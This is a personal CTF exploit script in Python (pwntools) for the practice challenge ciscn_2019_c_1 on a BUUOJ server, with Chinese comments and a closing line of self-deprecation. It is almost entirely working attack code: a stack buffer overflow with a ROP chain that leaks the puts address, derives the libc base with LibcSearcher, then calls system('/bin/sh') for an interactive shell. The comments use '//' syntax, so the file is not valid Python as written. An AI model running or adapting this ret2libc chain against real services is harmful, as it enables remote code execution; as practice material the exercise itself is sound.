1 from pwn import*                                                           
  2 from LibcSearcher import *
  3 io=remote('node3.buuoj.cn',26312)
  4 elf=ELF("./ciscn_2019_c_1")
  5 puts_plt=elf.plt['puts']//等于的是puts.plt的地址
  6 puts_got=elf.got['puts']
  7 rdi_ret=0x400c83
  8 ret=0x4006b9
  9 main=elf.symbols['main']
 10 io.recv()
 11 io.sendline("1")
 12 io.recvuntil('ed\n')
 13 payload1=b'a'*88+p64(rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(main)//puts的参数是puts.got表的地址，但是puts出来的是地址对应的内容
 14 io.sendline(payload1)
 15 io.recvuntil("Ciphertext\n")
 16 io.recvuntil("\n")//接收了puts(s)
 17 puts_real=u64(io.recvuntil('\n',drop=True).ljust(8,b'\x00'))//drop=True是指最后一个不写入，.ljust(8,b'\x00') ljust是左对齐函数，即在后面补b'\x00'字符串，一个b'\x00'代表一个字节，而地址是6字节字符，所以需要补两个字符。为什么是左对齐：因为存储是小端序。u64函数是将字符串解析为地址
 18 //print(hex(puts_real))
 19 io.sendline("1")
 20 libc=LibcSearcher('puts',puts_real)
 21 libcbase=puts_real-libc.dump('puts')
 22 system=libcbase+libc.dump('system')
 23 shell=libcbase+libc.dump('str_bin_sh')//dump里的字典
24payload2=b'a'*88+p64(ret)+p64(rdi_ret)+p64(shell)+p64(system)
 25 io.sendline(payload2)
 26 io.interactive()   

ciscn_2019_c_1
我为什么如此菜，每天都在自闭中